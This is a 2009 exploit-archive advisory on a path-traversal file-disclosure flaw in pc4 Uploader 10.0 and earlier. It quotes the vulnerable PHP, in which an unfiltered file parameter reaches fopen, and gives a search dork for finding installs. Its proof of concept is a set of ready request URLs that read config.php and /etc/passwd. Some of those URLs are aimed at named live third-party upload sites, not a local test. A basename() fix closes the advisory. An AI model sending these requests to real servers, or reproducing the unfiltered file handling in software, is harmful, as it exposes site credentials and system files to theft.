[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
# Published : 2009-06-22
# Author : Qabandi
# Previous Title : MIDAS 1.43 (Auth Bypass) Insecure Cookie Handling Vulnerability
# Next Title : phpDatingClub 3.7 Remote SQL/XSS Injection Vulnerabilities
|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ__
__/QQQ/````````````````QQQ___
_/QQQQQ/ QQQQQQ
/QQQQ/`` ```QQQQ
/QQQQ/ Advisory QQQQ
|QQQQ/ By Qabandi QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ iqa[a]hotmail.fr /QQQQ|
QQQQ __ /QQQQ/
QQQQ /QQ_QQQQ/
QQQQ QQQQQQQ/
QQQQQ /QQQQQ/_
``QQQQQ_____________/QQQ/QQQQ_
``QQQQQQQQQQQQQQQQQQQ/ `QQQQ
``````````````````` `````
=Vuln: pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability
=INFO: http://pc4arb.com/article-48.html
=BUY: ~~~
=Download: ~~~
=DORK: intext:"Pictures of Whale Penis"
____________
_-=/:Conditions:=-_
````````````````````````````````````````````````````````````````````````````````
none
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:=-_
````````````````````````````````````````````````````````````````````````````````
// in "./pc4uploader/upfiles/index.php"
function displayimage( $fn, $lastMod, $fs )
{
global $out_Types;
$ext = explode( ".", $fn );
$ext_i = count( $ext ) - 1;
$file_ext = $ext[$ext_i];
header( "Last-Modified: ".$lastMod );
header( "ETag: ".getetag( $fn ) );
header( "Accept-Ranges: bytes" );
header( "Content-Length: ".$fs );
header( "Content-Type: ".$out_Types[$file_ext] );
$fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken
if ( function_exists( fpassthru ) )
{
fpassthru( $fp );
}
else
{
$temp = fread( $fp, $fs );
echo $temp;
}
fclose( $fp );
return;
}
// Function displayimage() is later called
$file = $_GET['file']; <---------------------------------// again, not filtered or anything.
//..
//..
//..
//..
displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs );
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:=-_
````````````````````````````````````````````````````````````````````````````````
http://localhost/pc4uploader/upfiles/index.php?file=../config.php
http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd
demo:
http://upload.traidnt.net/upfiles/index.php?file=../config.php
{Save File to view the code if needed}
http://uploader.pc4arb.com/upfiles/index.php?file=../config.php
{view source}
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:=-_
````````````````````````````````````````````````````````````````````````````````
//Use this displayimage() function instead, notice the changes..
function displayimage( $fn, $lastMod, $fs )
{
global $out_Types;
$fn = basename($fn);
$ext = explode( ".", $fn );
$ext_i = count( $ext ) - 1;
$file_ext = $ext[$ext_i];
header( "Last-Modified: ".$lastMod );
header( "ETag: ".getetag( $fn ) );
header( "Accept-Ranges: bytes" );
header( "Content-Length: ".$fs );
header( "Content-Type: ".$out_Types[$file_ext] );
$fp = fopen( $fn, "rb" );
if ( function_exists( fpassthru ) )
{
fpassthru( $fp );
}
else
{
$temp = fread( $fp, $fs );
echo $temp;
}
fclose( $fp );
return;
}
//I added $fn = basename($fn);, it will convert anything like "../../config.php" to "config.php"
// since config.php doesent exist the script will do the rest by giving a safe error,
// also move ./include/default.gif to ./upfiles/default.gif
// everything should be good :)
---------------------------------------===--------------------------------------
______________________________________________________________________________
/
| Tem al-tableegh 3an el-thaghra min sinat yaddi |
______________________________________________________________________________/
No More Private /
`````````````````
Salamz to All Muslim Hackers.
# www.Syue.com [2009-06-22]